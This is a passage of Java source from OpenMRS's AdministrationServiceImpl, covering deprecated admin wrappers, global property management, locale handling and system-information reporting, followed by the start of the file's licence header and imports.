updatePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void deletePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().purgePatientIdentifierType(patientIdentifierType); } /** * Create a new Tribe * * @param tribe Tribe to create * @throws APIException * @deprecated */ @Deprecated public void createTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Update Tribe * * @param tribe Tribe to update * @throws APIException * @deprecated */ @Deprecated public void updateTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Delete Tribe * * @param tribe Tribe to delete * @throws APIException * @deprecated */ @Deprecated public void deleteTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Retire Tribe * * @param tribe Tribe to retire * @throws APIException * @deprecated */ @Deprecated public void retireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Unretire Tribe * * @param tribe Tribe to unretire * @throws APIException * @deprecated */ @Deprecated public void unretireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * @deprecated */ @Deprecated public void createFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void updateFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void deleteFieldType(FieldType fieldType) throws APIException { Context.getFormService().purgeFieldType(fieldType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void createMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void updateMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#purgeMimeType(MimeType)} */ @Deprecated public void deleteMimeType(MimeType mimeType) throws APIException { Context.getObsService().purgeMimeType(mimeType); } /** * @see org.openmrs.api.AdministrationService#createLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void createLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#updateLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void updateLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#deleteLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void deleteLocation(Location location) throws APIException { Context.getLocationService().purgeLocation(location); } /** * @see org.openmrs.api.AdministrationService#createRole(org.openmrs.Role) * @deprecated */ @Deprecated public void createRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#updateRole(org.openmrs.Role) * @deprecated */ @Deprecated public void updateRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#deleteRole(org.openmrs.Role) * @deprecated */ @Deprecated public void deleteRole(Role role) throws APIException { Context.getUserService().purgeRole(role); } /** * @see org.openmrs.api.AdministrationService#createPrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void createPrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#updatePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void updatePrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#deletePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void deletePrivilege(Privilege privilege) throws APIException { Context.getUserService().purgePrivilege(privilege); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().purgeConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().purgeConceptDatatype(cd); } /** * Create a new Report * * @param report Report to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORTS); dao.createReport(report); } /** * Update Report * * @param report Report to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORTS); dao.updateReport(report); } /** * Delete Report * * @param report Report to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORTS); dao.deleteReport(report); } /** * Create a new Report Object * * @param reportObject Report Object to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS); dao.createReportObject(reportObject); } /** * Update Report Object * * @param reportObject Report Object to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS); dao.updateReportObject(reportObject); } /** * Delete Report Object * * @param reportObjectId Internal Integer identifier of Report Object to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReportObject(Integer reportObjectId) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS); dao.deleteReportObject(reportObjectId); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWord(Concept concept) throws APIException { Context.getConceptService().updateConceptWord(concept); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWords() throws APIException { Context.getConceptService().updateConceptWords(); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptWords(Integer conceptIdStart, Integer conceptIdEnd) throws APIException { Context.getConceptService().updateConceptWords(conceptIdStart, conceptIdEnd); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void mapConceptProposalToConcept(ConceptProposal cp, Concept mappedConcept) throws APIException { Context.getConceptService().mapConceptProposalToConcept(cp, mappedConcept); } /** * @deprecated moved to ConceptService * @see org.openmrs.api.AdministrationService#rejectConceptProposal(org.openmrs.ConceptProposal) */ @Deprecated public void rejectConceptProposal(ConceptProposal cp) { Context.getConceptService().rejectConceptProposal(cp); } /** * @see org.openmrs.api.AdministrationService#mrnGeneratorLog(java.lang.String, * java.lang.Integer, java.lang.Integer) * @deprecated */ @Deprecated public void mrnGeneratorLog(String site, Integer start, Integer count) throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); dao.mrnGeneratorLog(site, start, count); } /** * @see org.openmrs.api.AdministrationService#getMRNGeneratorLog() * @deprecated */ @Deprecated @Transactional(readOnly = true) public Collection<?> getMRNGeneratorLog() throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); return dao.getMRNGeneratorLog(); } /** * Static-ish variable used to cache the system variables. This is not static so that every time * a module is loaded or removed the variable is destroyed (along with the administration * service) and recreated the next time it is called */ protected SortedMap<String, String> systemVariables = null; /** * Set of locales which can be used to present messages in the user interface. Created lazily as * needed by {@link #getAllowedLocales()}. */ private HashSet<Locale> presentationLocales; /** * @see org.openmrs.api.AdministrationService#getSystemVariables() */ @Transactional(readOnly = true) public SortedMap<String, String> getSystemVariables() throws APIException { if (systemVariables == null) { systemVariables = new TreeMap<String, String>(); // Added the server's fully qualified domain name try { systemVariables.put("OPENMRS_HOSTNAME", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { systemVariables.put("OPENMRS_HOSTNAME", "Unknown host: " + e.getMessage()); } systemVariables.put("OPENMRS_VERSION", String.valueOf(OpenmrsConstants.OPENMRS_VERSION)); systemVariables.put("DATABASE_NAME", OpenmrsConstants.DATABASE_NAME); systemVariables.put("DATABASE_BUSINESS_NAME", OpenmrsConstants.DATABASE_BUSINESS_NAME); systemVariables.put("OBSCURE_PATIENTS", String.valueOf(OpenmrsConstants.OBSCURE_PATIENTS)); systemVariables.put("OBSCURE_PATIENTS_FAMILY_NAME", OpenmrsConstants.OBSCURE_PATIENTS_FAMILY_NAME); systemVariables.put("OBSCURE_PATIENTS_GIVEN_NAME", OpenmrsConstants.OBSCURE_PATIENTS_GIVEN_NAME); systemVariables.put("OBSCURE_PATIENTS_MIDDLE_NAME", OpenmrsConstants.OBSCURE_PATIENTS_MIDDLE_NAME); systemVariables.put("MODULE_REPOSITORY_PATH", ModuleUtil.getModuleRepository().getAbsolutePath()); systemVariables.put("OPERATING_SYSTEM_KEY", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM_KEY)); systemVariables.put("OPERATING_SYSTEM", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM)); } return systemVariables; } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName) throws APIException { // This method should not have any authorization check if (propertyName == null) return null; return dao.getGlobalProperty(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String, * java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName, String defaultValue) throws APIException { String s = getGlobalProperty(propertyName); if (s == null) return defaultValue; return s; } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyObject(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyObject(String propertyName) { return dao.getGlobalPropertyObject(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperties() * @deprecated */ @Deprecated @Transactional(readOnly = true) public List<GlobalProperty> getGlobalProperties() throws APIException { return Context.getAdministrationService().getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperties(java.util.List) * @deprecated */ @Deprecated public void setGlobalProperties(List<GlobalProperty> props) throws APIException { Context.getAdministrationService().saveGlobalProperties(props); } /** * @see org.openmrs.api.AdministrationService#deleteGlobalProperty(java.lang.String) * @deprecated */ @Deprecated public void deleteGlobalProperty(String propertyName) throws APIException { Context.getAdministrationService().purgeGlobalProperty(new GlobalProperty(propertyName)); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(java.lang.String, * java.lang.String) */ public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { GlobalProperty gp = Context.getAdministrationService().getGlobalPropertyObject(propertyName); if (gp == null) { gp = new GlobalProperty(); gp.setProperty(propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#updateGlobalProperty(java.lang.String, * java.lang.String) */ public void updateGlobalProperty(String propertyName, String propertyValue) throws IllegalStateException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { throw new IllegalStateException("Global property with the given propertyName does not exist" + propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void setGlobalProperty(GlobalProperty gp) throws APIException { Context.getAdministrationService().saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void addGlobalProperty(GlobalProperty gp) { setGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(java.lang.String, * java.lang.String) * @deprecated */ @Deprecated public void addGlobalProperty(String propertyName, String propertyValue) throws APIException { //dao.addGlobalProperty(propertyName, propertyValue); Context.getAdministrationService().saveGlobalProperty(new GlobalProperty(propertyName, propertyValue)); } /** * @see org.openmrs.api.AdministrationService#getAllGlobalProperties() */ @Transactional(readOnly = true) public List<GlobalProperty> getAllGlobalProperties() throws APIException { return dao.getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesByPrefix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesByPrefix(String prefix) { return dao.getGlobalPropertiesByPrefix(prefix); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesBySuffix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesBySuffix(String suffix) { return dao.getGlobalPropertiesBySuffix(suffix); } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperty(org.openmrs.GlobalProperty) */ public void purgeGlobalProperty(GlobalProperty globalProperty) throws APIException { notifyGlobalPropertyDelete(globalProperty.getProperty()); dao.deleteGlobalProperty(globalProperty); } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperties(java.util.List) */ public List<GlobalProperty> saveGlobalProperties(List<GlobalProperty> props) throws APIException { log.debug("saving a list of global properties"); // add all of the new properties for (GlobalProperty prop : props) { if (prop.getProperty() != null && prop.getProperty().length() > 0) { Context.getAdministrationService().saveGlobalProperty(prop); } } return props; } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperty(org.openmrs.GlobalProperty) */ public GlobalProperty saveGlobalProperty(GlobalProperty gp) throws APIException { // only try to save it if the global property has a key if (gp.getProperty() != null && gp.getProperty().length() > 0) { CustomDatatypeUtil.saveIfDirty(gp); dao.saveGlobalProperty(gp); notifyGlobalPropertyChange(gp); return gp; } return gp; } /** * @see org.openmrs.api.AdministrationService#executeSQL(java.lang.String, boolean) */ public List<List<Object>> executeSQL(String sql, boolean selectOnly) throws APIException { if (sql == null || sql.trim().equals("")) return null; return dao.executeSQL(sql, selectOnly); } /** * @see org.openmrs.api.AdministrationService#addGlobalPropertyListener(GlobalPropertyListener) */ public void addGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().add(listener); } /** * @see org.openmrs.api.AdministrationService#removeGlobalPropertyListener(GlobalPropertyListener) */ public void removeGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().remove(listener); } /** * Calls global property listeners registered for this create/change * * @param gp */ private void notifyGlobalPropertyChange(GlobalProperty gp) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(gp.getProperty())) listener.globalPropertyChanged(gp); } /** * Calls global property listeners registered for this delete * * @param propertyName */ private void notifyGlobalPropertyDelete(String propertyName) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(propertyName)) listener.globalPropertyDeleted(propertyName); } /** * @see org.openmrs.api.AdministrationService#getImplementationId() */ @Transactional(readOnly = true) public ImplementationId getImplementationId() throws APIException { String property = Context.getAdministrationService().getGlobalProperty( OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); // fail early if no gp has been defined yet if (property == null) return null; try { ImplementationId implId = OpenmrsUtil.getSerializer().read(ImplementationId.class, property); return implId; } catch (Throwable t) { log.debug("Error while getting implementation id", t); } return null; } /** * @see org.openmrs.api.AdministrationService#setImplementationId(org.openmrs.ImplementationId) */ public void setImplementationId(ImplementationId implementationId) throws APIException { if (implementationId == null) return; // check the validity of this implementation id with the server String description = implementationId.getDescription(); try { // check that source id is valid description = checkImplementationIdValidity(implementationId.getImplementationId(), description, implementationId.getPassphrase()); // save the server's description back to this concept source object implementationId.setDescription(description); boolean foundMatchingSource = false; // loop over the concept sources to make sure one exists for this hl7Code/implementationId List<ConceptSource> sources = Context.getConceptService().getAllConceptSources(); if (sources != null) { for (ConceptSource source : sources) { if (implementationId.getImplementationId().equals(source.getHl7Code())) { foundMatchingSource = true; } } } // if no ConceptSource currently exists with this implementationId, save this implId // as a new ConceptSource if (!foundMatchingSource) { ConceptSource newConceptSource = new ConceptSource(); newConceptSource.setName(implementationId.getName()); newConceptSource.setDescription(implementationId.getDescription()); newConceptSource.setHl7Code(implementationId.getImplementationId()); if (Context.getAuthenticatedUser() == null) // (hackish) newConceptSource.setCreator(new User(1)); // fake the user because no one is logged in Context.getConceptService().saveConceptSource(newConceptSource); } // serialize and save the ImplementationId to the global properties table StringWriter stringWriter = new StringWriter(); OpenmrsUtil.getSerializer().write(implementationId, stringWriter); Context.getAdministrationService().saveGlobalProperty( new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID, stringWriter.toString())); } catch (APIException e) { throw e; } catch (Exception e) { // pass any other exceptions on up the train throw new APIException(e); } finally { // save an empty concept source to the database when something fails? } } /** * Checks the remote server for this exact implementation id. Returns the description if 1) * there is no implementation id or 2) there is a implementation id and this passphrase matches * it. In the case of 1), this implementation id and passphrase are saved to the remote server's * database * * @param implementationId * @param description * @param passphrase * @return the stored description on the remote server * @throws APIException * @throws UnsupportedEncodingException */ private String checkImplementationIdValidity(String implementationId, String description, String passphrase) throws APIException { if (!StringUtils.hasLength(implementationId)) throw new APIException("The implementationid cannot be empty"); if (!StringUtils.hasLength(description)) throw new APIException("The description cannot be empty"); if (!StringUtils.hasLength(passphrase)) throw new APIException("The passphrase cannot be empty"); // set up the data map to post to the openmrs server Map<String, String> data = new HashMap<String, String>(); data.put("implementationId", implementationId); data.put("description", description); data.put("passphrase", passphrase); String response = implementationIdHttpClient.post(data); response = response.trim(); if ("".equals(response)) { String ms = Context.getMessageSourceService().getMessage("ImplementationId.connectionError", new String[] { implementationId }, Context.getLocale()); throw new APIException(ms); } if (log.isDebugEnabled()) log.debug("Response: " + response); if (response.startsWith("Success")) { response = response.replace("Success", ""); return response.trim(); } String ms = Context.getMessageSourceService().getMessage("ImplementationId.invalidIdorPassphrase", new String[] { description }, Context.getLocale()); throw new APIException(ms); } /** * @see org.openmrs.api.AdministrationService#getAllowedLocales() */ @Transactional(readOnly = true) public List<Locale> getAllowedLocales() { // lazy-load the global locale list and initialize with current global property value if (globalLocaleList == null) { globalLocaleList = new GlobalLocaleList(); Context.getAdministrationService().addGlobalPropertyListener(globalLocaleList); } Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales(); // update the GlobalLocaleList.allowedLocales by faking a global property change if (allowedLocales == null) { // use a default language of "english" if they have cleared this GP for some reason String currentPropertyValue = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, LocaleUtility.getDefaultLocale().toString()); GlobalProperty allowedLocalesProperty = new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, currentPropertyValue); globalLocaleList.globalPropertyChanged(allowedLocalesProperty); allowedLocales = globalLocaleList.getAllowedLocales(); } // allowedLocales is guaranteed to not be null at this point return new ArrayList<Locale>(allowedLocales); } /** * Used by spring to set the GlobalLocaleList on this implementation * * @param gll the GlobalLocaleList object that is registered to the GlobalPropertyListeners as * well */ public void setGlobalLocaleList(GlobalLocaleList gll) { globalLocaleList = gll; } /** * @see org.openmrs.api.AdministrationService#getPresentationLocales() */ @Transactional(readOnly = true) public Set<Locale> getPresentationLocales() { if (presentationLocales == null) { presentationLocales = new HashSet<Locale>(); Collection<Locale> messageLocales = Context.getMessageSourceService().getLocales(); List<Locale> allowedLocales = getAllowedLocales(); for (Locale possibleLocale : messageLocales) { if (allowedLocales.contains(possibleLocale)) { presentationLocales.add(possibleLocale); } else { // to be sure, check for language-only matches for (Locale allowedLocale : allowedLocales) { if (("".equals(allowedLocale.getCountry()) || "".equals(possibleLocale.getCountry())) && (allowedLocale.getLanguage().equals(possibleLocale.getLanguage()))) { presentationLocales.add(possibleLocale); break; } } } } } return presentationLocales; } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyChanged(org.openmrs.GlobalProperty) */ public void globalPropertyChanged(GlobalProperty newValue) { if (newValue.getProperty().equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST)) { // reset the calculated locale values presentationLocales = null; } } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyDeleted(java.lang.String) */ public void globalPropertyDeleted(String propertyName) { // TODO Auto-generated method stub } /** * @see org.openmrs.api.GlobalPropertyListener#supportsPropertyName(java.lang.String) */ public boolean supportsPropertyName(String propertyName) { return propertyName.equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyByUuid(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyByUuid(String uuid) { return dao.getGlobalPropertyByUuid(uuid); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyValue(java.lang.String, * java.lang.Object) */ @SuppressWarnings("unchecked") public <T> T getGlobalPropertyValue(String propertyName, T defaultValue) throws APIException { if (defaultValue == null) throw new IllegalArgumentException("The defaultValue argument cannot be null"); String propVal = getGlobalProperty(propertyName); if (!StringUtils.hasLength(propVal)) return defaultValue; try { return (T) defaultValue.getClass().getDeclaredConstructor(String.class).newInstance(propVal); } catch (InstantiationException e) { throw new APIException(defaultValue.getClass().getName() + " is not able to be instantiated with value: " + propVal, e); } catch (NoSuchMethodException e) { throw new APIException(defaultValue.getClass().getName() + " does not have a string constructor", e); } catch (Exception e) { log.error("Unable to turn value '" + propVal + "' into type " + defaultValue.getClass().getName(), e); return defaultValue; } } /** * @see org.openmrs.api.AdministrationService#getSystemInformation() */ @Transactional(readOnly = true) public Map<String, Map<String, String>> getSystemInformation() throws APIException { Map<String, Map<String, String>> systemInfoMap = new LinkedHashMap<String, Map<String, String>>(); systemInfoMap.put("SystemInfo.title.openmrsInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.OpenMRSInstallation.systemDate", new SimpleDateFormat("yyyy-MM-dd").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.systemTime", new SimpleDateFormat("HH:mm:ss").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.openmrsVersion", OpenmrsConstants.OPENMRS_VERSION); try { put("SystemInfo.hostname", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { put("SystemInfo.hostname", "Unknown host: " + e.getMessage()); } } }); systemInfoMap.put("SystemInfo.title.javaRuntimeEnvironmentInformation", new LinkedHashMap<String, String>() { Properties properties = System.getProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.JavaRuntimeEnv.operatingSystem", properties.getProperty("os.name")); put("SystemInfo.JavaRuntimeEnv.operatingSystemArch", properties.getProperty("os.arch")); put("SystemInfo.JavaRuntimeEnv.operatingSystemVersion", properties.getProperty("os.version")); put("SystemInfo.JavaRuntimeEnv.javaVersion", properties.getProperty("java.version")); put("SystemInfo.JavaRuntimeEnv.javaVendor", properties.getProperty("java.vendor")); put("SystemInfo.JavaRuntimeEnv.jvmVersion", properties.getProperty("java.vm.version")); put("SystemInfo.JavaRuntimeEnv.jvmVendor", properties.getProperty("java.vm.vendor")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeName", properties.getProperty("java.runtime.name")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeVersion", properties.getProperty("java.runtime.version")); put("SystemInfo.JavaRuntimeEnv.userName", properties.getProperty("user.name")); put("SystemInfo.JavaRuntimeEnv.systemLanguage", properties.getProperty("user.language")); put("SystemInfo.JavaRuntimeEnv.systemTimezone", properties.getProperty("user.timezone")); put("SystemInfo.JavaRuntimeEnv.fileSystemEncoding", properties.getProperty("sun.jnu.encoding")); put("SystemInfo.JavaRuntimeEnv.userDirectory", properties.getProperty("user.dir")); put("SystemInfo.JavaRuntimeEnv.tempDirectory", properties.getProperty("java.io.tmpdir")); } }); systemInfoMap.put("SystemInfo.title.memoryInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; Runtime runtime = Runtime.getRuntime(); { put("SystemInfo.Memory.totalMemory", convertToMegaBytes(runtime.totalMemory())); put("SystemInfo.Memory.freeMemory", convertToMegaBytes(runtime.freeMemory())); put("SystemInfo.Memory.maximumHeapSize", convertToMegaBytes(runtime.maxMemory())); } }); systemInfoMap.put("SystemInfo.title.dataBaseInformation", new LinkedHashMap<String, String>() { Properties properties = Context.getRuntimeProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.Database.name", OpenmrsConstants.DATABASE_NAME); put("SystemInfo.Database.connectionURL", properties.getProperty("connection.url")); put("SystemInfo.Database.userName", properties.getProperty("connection.username")); put("SystemInfo.Database.driver", properties.getProperty("hibernate.connection.driver_class")); put("SystemInfo.Database.dialect", properties.getProperty("hibernate.dialect")); } }); systemInfoMap.put("SystemInfo.title.moduleInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.Module.repositoryPath", ModuleUtil.getModuleRepository().getAbsolutePath()); Collection<Module> loadedModules = ModuleFactory.getLoadedModules(); for (Module module : loadedModules) { String moduleInfo = module.getVersion() + " " + (module.isStarted() ? "" : Context.getMessageSourceService().getMessage("Module.notStarted")); put(module.getName(), moduleInfo); } } }); return systemInfoMap; } /** * @param bytes to be converted into mega bytes * @return memory in mega bytes */ private String convertToMegaBytes(long bytes) { int ONE_KILO_BYTE = 1024; return String.valueOf(bytes / ONE_KILO_BYTE / ONE_KILO_BYTE) + " MB"; } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperties(java.util.List) */ @Override public void purgeGlobalProperties(List<GlobalProperty> globalProperties) throws APIException { for (GlobalProperty globalProperty : globalProperties) { Context.getAdministrationService().purgeGlobalProperty(globalProperty); } } /** * @see AdministrationService#getMaximumPropertyLength(Class, String) */ @Override @Transactional(readOnly = true) public int getMaximumPropertyLength(Class<? extends OpenmrsObject> aClass, String fieldName) { return dao.getMaximumPropertyLength(aClass, fieldName); } /** * @see org.openmrs.api.AdministrationService#validate(java.lang.Object, Errors) */ @Override @Transactional(readOnly = true) public void validate(Object object, Errors errors) throws APIException { if (object == null) throw new APIException(Context.getMessageSourceService().getMessage("error.null")); dao.validate(object, errors); } /** * @see org.openmrs.api.AdministrationService#getSearchLocales(org.openmrs.User) */ @Override @Transactional(readOnly = true) public List<Locale> getSearchLocales() throws APIException { Set<Locale> locales = new LinkedHashSet<Locale>(); Locale currentLocale = Context.getLocale(); locales.add(currentLocale); //the currently used full locale //the currently used language locales.add(new Locale(currentLocale.getLanguage())); //add user's proficient locales User user = Context.getAuthenticatedUser(); if (user != null) { List<Locale> proficientLocales = user.getProficientLocales(); if (proficientLocales != null) { locales.addAll(proficientLocales); } } //limit locales to only allowed locales List<Locale> allowedLocales = getAllowedLocales(); if (allowedLocales != null) { Set<Locale> retainLocales = new HashSet<Locale>(); for (Locale allowedLocale : allowedLocales) { retainLocales.add(allowedLocale); retainLocales.add(new Locale(allowedLocale.getLanguage())); } locales.retainAll(retainLocales); } return new ArrayList<Locale>(locales); } @Override public void setImplementationIdHttpClient(HttpClient implementationIdHttpClient) { this.implementationIdHttpClient = implementationIdHttpClient; } }
api/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java
/** * The contents of this file are subject to the OpenMRS Public License * Version 1.0 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://license.openmrs.org * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * Copyright (C) OpenMRS, LLC. All Rights Reserved. */ package org.openmrs.api.impl; import java.io.StringWriter; import java.io.UnsupportedEncodingException; import java.net.InetAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Properties; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.openmrs.Concept; import org.openmrs.ConceptClass; import org.openmrs.ConceptDatatype; import org.openmrs.ConceptProposal; import org.openmrs.ConceptSource; import org.openmrs.EncounterType; import org.openmrs.FieldType; import 